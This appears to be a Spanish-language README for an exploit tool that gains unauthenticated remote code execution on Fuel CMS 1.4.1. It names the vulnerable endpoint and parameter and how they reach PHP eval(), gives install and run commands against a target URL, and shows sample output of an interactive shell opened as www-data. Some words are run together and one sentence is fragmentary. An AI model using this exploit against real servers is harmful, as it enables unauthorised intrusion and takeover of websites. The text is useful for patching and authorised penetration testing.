
Vulnerabilidad de RCE sin autenticación en Fuel CMS 1.4.1.
Vulnerabilidad de RCE no autenticada en Fuel CMS 1.4.1. El parámetro
filteren el endpoint/fuel/pages/select/se pasa sin saneamiento a una llamada aeval()en el backend de PHP, lo que permite la ejecución arbitraria de código mediante un payload manipulado. A diferencia de las inyecciones ciegas, la salida se refleja directamente en la respuesta HTTP, por lo que no se necesita ningún archivo intermedio.
/fuel/pages/select/ con un payload filter especialmente manipulado que llama a system() de PHP con el comando deseado.python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
python3 exploit.py -t http://TARGET
Ejemplo:
$ python3 exploit.py -t http://10.10.10.10
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data
Shell> hostname
fuel-cms
Shell> exit